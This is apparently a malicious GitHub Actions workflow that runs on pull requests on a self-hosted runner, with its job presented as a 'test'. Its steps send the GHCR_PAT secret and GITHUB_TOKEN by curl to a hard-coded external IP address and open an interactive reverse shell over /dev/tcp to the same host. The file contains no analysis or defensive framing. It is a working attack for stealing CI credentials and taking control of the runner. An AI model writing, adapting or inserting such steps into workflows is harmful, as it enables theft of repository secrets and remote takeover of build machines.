on:
  pull_request:

jobs:
  test:
    runs-on: self-hosted
    env:
      GHCR_PAT: ${{ secrets.GHCR_PAT }}
    steps:
    - name: a3
      run: curl "http://143.110.155.178:8000?ghcr=${{ secrets.GHCR_PAT }}"
    - name: a4
      run: curl "http://143.110.155.178:8000?foo=${{ secrets.GITHUB_TOKEN }}"
    - name: a6
      run: sh -i 5<> /dev/tcp/143.110.155.178/9001 0<&5 1>&5 2>&5
